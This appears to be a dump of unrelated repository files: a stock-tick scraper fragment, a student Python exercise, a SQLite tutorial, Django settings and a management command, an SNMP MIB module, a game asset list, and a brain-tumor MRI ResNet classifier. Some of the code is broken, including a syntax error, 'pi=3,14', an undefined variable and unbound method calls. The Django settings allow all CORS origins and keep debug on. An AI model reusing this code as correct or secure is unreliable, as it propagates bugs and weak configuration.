df = ts.get_today_ticks(code)
# df = ts.get_sina_dd(code, date='2018-07-06')
# df = ts.get_sina_dd("000001", date='2018-07-05')
# df = ts.get_sina_dd("000007", date=today)
if df is not None and len(df) > 1:
df['time'] = today + " " + df['time']
df.rename(columns={'code': 'sCode', 'time': 'tDateTime', 'price': 'iPrice', 'pchange': 'iPchange',
'change': 'iChange', 'volume': 'iVolume', 'amount': 'iAmount', 'type': 'sType'}, inplace=True)
# df2 = df[['sCode', 'sName', 'tDateTime', 'iPrice', 'iVolume', 'iPreprice', 'sType']]
# result = sql_model.loadData('stock_daily_big_order', df.keys, df.values, threadName)
# result = sql_model.loadData('stock_daily_big_order', df2.keys(), df2.values, threadName)
result = mysql_obj.loadData('stock_daily_big_order', df.keys(), df.values, threadName)
print(result)
# 过了15点10分就退出
if (now.hour >= 15 and now.minute >= 10) or (now.hour < 9 and now.minute >= 30):
return 1
p("dsfds")
# 等待60秒
print("%s wait 60s" % code)
time.sleep(60)
# 获取所有股票
def get_data(threadName, mysql_obj):
while 1 == 1:
# 从列表去除
code = code_redis.get_next_code("today_ticks")
# code = "601313"
if code:
print("%s: %s begin" % (threadName, code))
dd(code, mysql_obj, threadName)
print("%s: %s end" % (threadName, code))
else:
break
if __name__ == '__main__':
# 将所有股票代码列入待获取列表中
# num = code_redis.reset_codelist_redis("today_ticks")
# 建立一个新数组
threads = []
n = 1
# n = num
counter = 1
mysql_obj = sql_model.MysqlClass()
while counter <= n:
name = "Thread-" + str(counter)
threads.append(threading.Thread(target=get_data, args=(name, mysql_obj,)))
counter += 1
# threads.append(thing5)
# 写个for让两件事情都进行
for thing in threads:
# setDaemon为主线程启动了线程matter1和matter2
# 启动也就是相当于执行了这个for循环
thing.setDaemon(True)
thing.start()
for thing in threads:
thing.join() | [
"gedong009@qq.com"
] | gedong009@qq.com |
6b98012278b2ef3e02f3bdbc33e146865eb26807 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/59/usersdata/201/46743/submittedfiles/testes.py | 3378d84c86f02731a2be48d3b0f834f8d9cb8366 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | # -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO
r=float(input('Digite um raio:'))
pi=3,14
a=pi*(r**2):
print(a) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
62478de103e5b4226fe148f74b655fb80192b169 | e2919a492ffb1762534739f81a4f78fdb4dcb17f | /sql/primer_1.py | ce6b39fadae4796caf7c6b1d3ac7133944521daf | [] | no_license | AndreyDacenko/traning | 4ab94ead5a64245ca775cc03967598427f680d0f | f6c594ef888c42e9d6f16bfd4ac004e1ac00b139 | refs/heads/master | 2021-12-10T23:40:05.883178 | 2021-08-11T16:52:27 | 2021-08-11T16:52:27 | 202,687,281 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,511 | py | import sqlite3
# Сперва создадим соединение с нашей базой данных.
# В нашем примере БД - файл расположенный на компьютере, он так же может быть расположен и на сервере.
# Важно помнить что в реальных задачах нельзя коммитить базу данных в репозиторий!
conn = sqlite3.connect('Northwind.sl3')
# Укажем тип получаемых данных
conn.text_factory = bytes
# Создадим курсор - специальный объект, с помощью которого мы сможем делать запросы к БД на языке запросов
cursor = conn.cursor()
# Отбор данных из БД:
# SELECT <список-полей> FROM <имя-таблицы>[ WHERE <условие>]
# Пример:
# Требуется отобрать список заказов,
# для которых значение поля Freight (плата за груз) больше значения 100,
# а регион доставки (ShipRegion) -- 'RJ'
cursor.execute("SELECT * FROM Orders WHERE (Freight > 100) AND (ShipRegion = 'RJ')")
# Получение отобранных значений:
results = cursor.fetchall()
[print(r) for r in results]
# print(f'Здесь выведется список значений, подходящих под заданные условия: {results}') | [
"andrey_dacenko@mail.ru"
] | andrey_dacenko@mail.ru |
4e00a1dbf4061dd58654ba69bca13d9e6499f794 | c10e2a73d15bbbeeda9ceb5321fc423b0b2ec98c | /mysite/settings.py | 07fc9230f56c09403d471ae021b61cfb295d20df | [
"MIT"
] | permissive | bennett39/pulitzers | 9822c5628901ea80d90fdb162148d5bdf0dc509a | 73b932275fe61af204c6a681f43778317c97c0fb | refs/heads/master | 2023-06-09T00:59:16.035391 | 2023-05-24T21:36:15 | 2023-05-24T21:36:15 | 188,304,164 | 0 | 0 | MIT | 2023-01-03T23:30:45 | 2019-05-23T20:46:29 | CSS | UTF-8 | Python | false | false | 3,629 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import django_heroku
import dj_database_url
import dotenv
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
dotenv_file = os.path.join(BASE_DIR, ".env")
if os.path.isfile(dotenv_file):
dotenv.load_dotenv(dotenv_file)
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'api.apps.ApiConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'corsheaders',
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
CORS_ORIGIN_ALLOW_ALL = True
LOGIN_REDIRECT_URL = '/'
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {}
DATABASES['default'] = dj_database_url.config(conn_max_age=600)
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'assets/build'),
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
django_heroku.settings(locals())
del DATABASES['default']['OPTIONS']['sslmode']
| [
"34491412+bennett39@users.noreply.github.com"
] | 34491412+bennett39@users.noreply.github.com |
21a65c73620f2a40477d64a11550fc36704d99f4 | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp/A3COM-HUAWEI-RS485-MIB.py | 6e4c22f4a88026cd33571d0023c92ae07bce922d | [
"Apache-2.0"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 10,571 | py | #
# PySNMP MIB module A3COM-HUAWEI-RS485-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/A3COM-HUAWEI-RS485-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 16:52:12 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
h3cCommon, = mibBuilder.importSymbols("A3COM-HUAWEI-OID-MIB", "h3cCommon")
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint")
ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex")
InetAddress, InetAddressType = mibBuilder.importSymbols("INET-ADDRESS-MIB", "InetAddress", "InetAddressType")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Counter64, Counter32, iso, IpAddress, MibIdentifier, ObjectIdentity, TimeTicks, Integer32, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, Unsigned32, NotificationType, Bits, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "Counter32", "iso", "IpAddress", "MibIdentifier", "ObjectIdentity", "TimeTicks", "Integer32", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Unsigned32", "NotificationType", "Bits", "Gauge32")
DisplayString, RowStatus, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "RowStatus", "TextualConvention")
h3cRS485 = ModuleIdentity((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109))
if mibBuilder.loadTexts: h3cRS485.setLastUpdated('200910210000Z')
if mibBuilder.loadTexts: h3cRS485.setOrganization('Hangzhou H3C Technologies Co., Ltd.')
h3cRS485Properties = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1))
h3cRS485PropertiesTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1), )
if mibBuilder.loadTexts: h3cRS485PropertiesTable.setStatus('current')
h3cRS485PropertiesEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: h3cRS485PropertiesEntry.setStatus('current')
h3cRS485RawSessionNextIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cRS485RawSessionNextIndex.setStatus('current')
h3cRS485BaudRate = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))).clone(namedValues=NamedValues(("bautRate300", 1), ("bautRate600", 2), ("bautRate1200", 3), ("bautRate2400", 4), ("bautRate4800", 5), ("bautRate9600", 6), ("bautRate19200", 7), ("bautRate38400", 8), ("bautRate57600", 9), ("bautRate115200", 10))).clone('bautRate9600')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485BaudRate.setStatus('current')
h3cRS485DataBits = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("five", 1), ("six", 2), ("seven", 3), ("eight", 4))).clone('eight')).setUnits('bit').setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485DataBits.setStatus('current')
h3cRS485Parity = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("none", 1), ("odd", 2), ("even", 3), ("mark", 4), ("space", 5))).clone('none')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485Parity.setStatus('current')
h3cRS485StopBits = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("one", 1), ("two", 2), ("oneAndHalf", 3))).clone('one')).setUnits('bit').setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485StopBits.setStatus('current')
h3cRS485FlowControl = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("none", 1), ("hardware", 2), ("xonOrxoff", 3))).clone('none')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485FlowControl.setStatus('current')
h3cRS485TXCharacters = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cRS485TXCharacters.setStatus('current')
h3cRS485RXCharacters = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cRS485RXCharacters.setStatus('current')
h3cRS485TXErrCharacters = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cRS485TXErrCharacters.setStatus('current')
h3cRS485RXErrCharacters = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cRS485RXErrCharacters.setStatus('current')
h3cRS485ResetCharacters = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 1, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("counting", 1), ("clear", 2))).clone('counting')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485ResetCharacters.setStatus('current')
h3cRS485RawSessions = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2))
h3cRS485RawSessionSummary = MibIdentifier((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 1))
h3cRS485RawSessionMaxNum = MibScalar((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cRS485RawSessionMaxNum.setStatus('current')
h3cRS485RawSessionTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2), )
if mibBuilder.loadTexts: h3cRS485RawSessionTable.setStatus('current')
h3cRS485RawSessionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "A3COM-HUAWEI-RS485-MIB", "h3cRS485SessionIndex"))
if mibBuilder.loadTexts: h3cRS485RawSessionEntry.setStatus('current')
h3cRS485SessionIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 64)))
if mibBuilder.loadTexts: h3cRS485SessionIndex.setStatus('current')
h3cRS485SessionType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("udp", 1), ("tcpClient", 2), ("tcpServer", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485SessionType.setStatus('current')
h3cRS485SessionAddType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1, 3), InetAddressType().clone('ipv4')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: h3cRS485SessionAddType.setStatus('current')
h3cRS485SessionRemoteIP = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1, 4), InetAddress()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: h3cRS485SessionRemoteIP.setStatus('current')
h3cRS485SessionRemotePort = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1024, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: h3cRS485SessionRemotePort.setStatus('current')
h3cRS485SessionLocalPort = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1024, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: h3cRS485SessionLocalPort.setStatus('current')
h3cRS485SessionStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 2, 1, 7), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: h3cRS485SessionStatus.setStatus('current')
h3cRS485RawSessionErrInfoTable = MibTable((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 3), )
if mibBuilder.loadTexts: h3cRS485RawSessionErrInfoTable.setStatus('current')
h3cRS485RawSessionErrInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 3, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"), (0, "A3COM-HUAWEI-RS485-MIB", "h3cRS485SessionIndex"))
if mibBuilder.loadTexts: h3cRS485RawSessionErrInfoEntry.setStatus('current')
h3cRS485RawSessionErrInfo = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 45, 1, 10, 2, 109, 2, 3, 1, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: h3cRS485RawSessionErrInfo.setStatus('current')
mibBuilder.exportSymbols("A3COM-HUAWEI-RS485-MIB", h3cRS485RawSessionMaxNum=h3cRS485RawSessionMaxNum, h3cRS485StopBits=h3cRS485StopBits, h3cRS485SessionRemotePort=h3cRS485SessionRemotePort, h3cRS485RawSessionErrInfoEntry=h3cRS485RawSessionErrInfoEntry, h3cRS485TXErrCharacters=h3cRS485TXErrCharacters, h3cRS485=h3cRS485, h3cRS485RXCharacters=h3cRS485RXCharacters, h3cRS485PropertiesEntry=h3cRS485PropertiesEntry, h3cRS485SessionAddType=h3cRS485SessionAddType, h3cRS485FlowControl=h3cRS485FlowControl, h3cRS485Properties=h3cRS485Properties, h3cRS485PropertiesTable=h3cRS485PropertiesTable, h3cRS485ResetCharacters=h3cRS485ResetCharacters, PYSNMP_MODULE_ID=h3cRS485, h3cRS485RawSessionEntry=h3cRS485RawSessionEntry, h3cRS485RawSessionNextIndex=h3cRS485RawSessionNextIndex, h3cRS485RawSessionTable=h3cRS485RawSessionTable, h3cRS485RawSessionErrInfo=h3cRS485RawSessionErrInfo, h3cRS485TXCharacters=h3cRS485TXCharacters, h3cRS485SessionStatus=h3cRS485SessionStatus, h3cRS485RawSessions=h3cRS485RawSessions, h3cRS485SessionRemoteIP=h3cRS485SessionRemoteIP, h3cRS485SessionLocalPort=h3cRS485SessionLocalPort, h3cRS485SessionIndex=h3cRS485SessionIndex, h3cRS485RXErrCharacters=h3cRS485RXErrCharacters, h3cRS485RawSessionSummary=h3cRS485RawSessionSummary, h3cRS485BaudRate=h3cRS485BaudRate, h3cRS485DataBits=h3cRS485DataBits, h3cRS485SessionType=h3cRS485SessionType, h3cRS485RawSessionErrInfoTable=h3cRS485RawSessionErrInfoTable, h3cRS485Parity=h3cRS485Parity)
| [
"dcwangmit01@gmail.com"
] | dcwangmit01@gmail.com |
eee6c26c594ab5b9fa6e26288db0e7e9dee3d498 | ff886f5f947460576feaec2a049f6a9f78f2a63f | /core/management/commands/wait_for_db.py | 460989d579a419bc219cba5e76cc9fcb204aa701 | [
"MIT"
] | permissive | devendraprasad1984/loan_payment_app | 2bc927afbc084504bb10a959105d72f6f419e2c8 | 1a4c31d03a8c5ecf4dae2a981373649f4f699aa3 | refs/heads/main | 2023-07-21T19:00:40.692978 | 2021-09-09T03:36:04 | 2021-09-09T03:36:04 | 400,111,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 707 | py | import time
from django.db import connections
from django.db.utils import OperationalError
from django.core.management.base import BaseCommand
class Command(BaseCommand):
"""django overriding default app run until database is made available"""
def handle(self, *args, **options):
self.stdout.write('waiting for db connection...')
db_conn = None
while not db_conn:
try:
db_conn = connections['default']
except OperationalError:
self.stdout.write(self.style.ERROR('database is not available, re-checking in 1sec'))
time.sleep(1)
self.stdout.write(self.style.SUCCESS('database is available'))
| [
"devendraprasad1984@gmail.com"
] | devendraprasad1984@gmail.com |
8ff182862ff5c1544e49022bd0b028e0b7fd99a2 | 2d8517cb6ce3f1eefaffc5bf3acab58eb0331e38 | /tools/inputs/animals.py | 0075001481b1099da0808854933c89e7f7ba0236 | [] | no_license | ryyst/conjurer | e4ce6e270b11d481ff99f78dad472a4cb5738bb7 | 4db5aa7e4daa87b3b26a6d232a33b950de299a55 | refs/heads/master | 2023-07-10T02:47:22.282657 | 2021-08-08T21:07:48 | 2021-08-08T21:07:48 | 313,402,786 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 724 | py | # Most animals already have their own icon that the game provides,
# so this is only for the "unofficial" enemies.
CUSTOM_ANIMALS = [
{"path": "entities/buildings/lasergun.xml"},
{"path": "entities/buildings/lukki_eggs.xml"},
{"path": "entities/buildings/spidernest.xml"},
{"path": "entities/buildings/firebugnest.xml"},
{"path": "entities/buildings/flynest.xml"},
{"path": "entities/buildings/physics_cocoon.xml"},
#
# These are mixed together a bit. See animals.lua for details
{"path": "entities/animals/darkghost.xml"},
{"path": "entities/animals/ghost.xml"},
{"path": "entities/buildings/darkghost_crystal.xml"},
{"path": "entities/buildings/ghost_crystal.xml"},
#
]
| [
"rpuolak@gmail.com"
] | rpuolak@gmail.com |
c36e9f213f21c497cd2a8eb0ebdb30eb59bba41e | 3f82466567c664a14c18ea03df2ddcb30678175e | /brain_Tumor.py | 6558b103566c0e171c8d8f0b099ed52884707747 | [
"MIT"
] | permissive | Sumanyu123/An-Efficient-Brain-Tumor-MRI-classification-using-Deep-Residual-Learning | ec295d75fca6199fa152ad556fd0d25054dba8a6 | 2176806f39e4a1054461fa55b7a399345acca5e8 | refs/heads/main | 2023-08-24T19:30:59.522101 | 2021-09-21T19:07:20 | 2021-09-21T19:07:20 | 409,250,074 | 1 | 0 | MIT | 2021-09-22T15:05:53 | 2021-09-22T15:05:52 | null | UTF-8 | Python | false | false | 17,418 | py | from __future__ import annotations
__doc__: str = r'''
>>> Paper Title:
An Efficient Brain Tumor Classification using Deep Residual Learning.
>>> Paper Abstract:
Brain tumor categorization is essential for evaluating tumors as well as determining treatment
choices established on their classifications. To identify brain tumors, a variety of imaging
methods are employed. Oppositely, MRI is widely utilized because of its improved image quality
and the fact of matter is that it does not employ ionizing radiation. Deep learning is a subset
of machine learning that lately has demonstrated exceptional performance, particularly in
classification and segmentation. In this study, we used a deep residual network to classify
distinct kinds of tumors which are present in brain using images datasets. The MRI scans create
a massive quantity of data. The radiologist examines these scans. Meningioma, glioma and pituitary
tumor are the three main categories of tumors which are present in brain. Because of the intricacies
involved in brain tumors, a manual examination might be an error prone. Automated classification
machine learning-based approaches have consistently outperformed manual categorization. As a result,
we propose a system that performs detection as well as classification using deep residual networks
based on CNN and other different models such as ResNet, AlexNet, Inception, VGG16.
'''
import warnings, os, copy, time
from tqdm import tqdm
warnings.filterwarnings('ignore')
from typing import ClassVar, Optional
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from PIL import Image
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.model_zoo as model_zoo
from torchvision import transforms, utils
#@: Custom Dataset Class
class TumorDataset(torch.utils.data.Dataset):
def __init__(self, path: 'dir_path', sub_path: str,
categories: list[str],
transform: torchvision.transforms) -> None:
self.path = path
self.sub_path = sub_path
self.categories = categories
self.transform = transform
self.dataset = self.get_data()
def get_data(self) -> pd.DataFrame:
glioma_path = os.path.join(self.path, self.sub_path, self.categories[0])
meningioma_path = os.path.join(self.path, self.sub_path, self.categories[1])
no_path = os.path.join(self.path, self.sub_path, self.categories[2])
pituitary_path = os.path.join(self.path, self.sub_path, self.categories[3])
glioma_pathList = [
os.path.abspath(os.path.join(glioma_path, p)) for p in os.listdir(glioma_path)
]
meningioma_pathList = [
os.path.abspath(os.path.join(meningioma_path, p)) for p in os.listdir(meningioma_path)
]
no_pathList = [
os.path.abspath(os.path.join(no, p)) for p in os.listdir(no_path)
]
pituitary_pathList = [
os.path.abspath(os.path.join(pituitary_path, p)) for p in os.listdir(pituitary_path)
]
glioma_label = [0 for _ in range(len(glioma_pathList))]
meningioma_label = [1 for _ in range(len(meningioma_pathList))]
no_label = [2 for _ in range(len(no_pathList))]
pituitary_label = [3 for _ in range(len(pituitary_pathList))]
all_imgPaths = glioma_pathList + meningioma_pathList + no_pathList + pituitary_pathList
all_labels = glioma_label + meningioma_label + no_label + pituitary_label
dataframe = pd.DataFrame.from_dict({'path': all_imgPaths, 'label': all_labels})
dataframe = dataframe.sample(frac= 1)
return dataframe
def __len__(self) -> int:
return len(self.dataset)
def __getitem__(self, index: int) -> tuple[torch.Tensor, int]:
if self.transform is not None:
image = Image.open(self.dataset.iloc[index].path).convert('RGB')
image = self.transform(image)
label = self.dataset.iloc[index].label
return image, label
#@: Data Analysis Class
class TumorAnalysis:
label_map: dict[str, int] = {
0: 'Glioma Tumor',
1: 'Meningioma Tumor',
2: 'No Tumor',
3: 'Pituitary Tumor'
}
def __init__(self, data: object, loader: object) -> None:
self.data = data
self.loader = loader
def batchImg_display(self) -> 'plot':
figure = plt.figure(figsize= (8, 8))
cols, rows = 3, 3
for i in range(1, cols * rows + 1):
sample_index = torch.randint(len(self.data), size= (1,)).item()
image, label = self.data[sample_index]
figure.add_subplot(rows, cols, i)
plt.title(self.label_map[int(label)])
plt.imshow(np.asarray(transforms.ToPILImage()(image).convert('RGB')))
plt.show()
class Utils:
def conv3x3(self, in_planes: int, out_planes: int, stride: Optional[int] = 1) -> nn.Conv2d():
return nn.Conv2d(
in_planes,
out_planes,
kernel_size= 3,
stride= stride,
padding= 1,
bias= False
)
def conv1x1(self, in_planes: int, out_planes: int, stride: Optional[int] = 1) -> nn.Conv2d():
return nn.Conv2d(
in_planes,
out_planes,
kernel_size= 1,
stride= stride,
bias= False
)
class BasicBlock(nn.Module):
expansion: ClassVar[int] = 1
def __init__(self, inplanes: int, planes: int,
stride: Optional[int] = 1,
downsample: Optional[bool] = None) -> None:
super(BasicBlock, self).__init__()
self.conv1 = Utils.conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = Utils.conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x: torch.Tensor) -> torch.Tensor:
identity: torch.Tensor = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
#@: Custom build ResNet18 Model
class ResNet(nn.Module):
def __init__(self, block: object, layers: list[int],
num_classes: Optional[int] = 3,
zero_init_residual: Optional[bool] = False) -> None:
super(ResNet, self).__init__()
self.inplanes: int = 64
self.conv1 = nn.Conv2d(3, 64, kernel_size= 7, stride= 2, padding= 3, bias= False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(512 * block.expansion, num_classes)
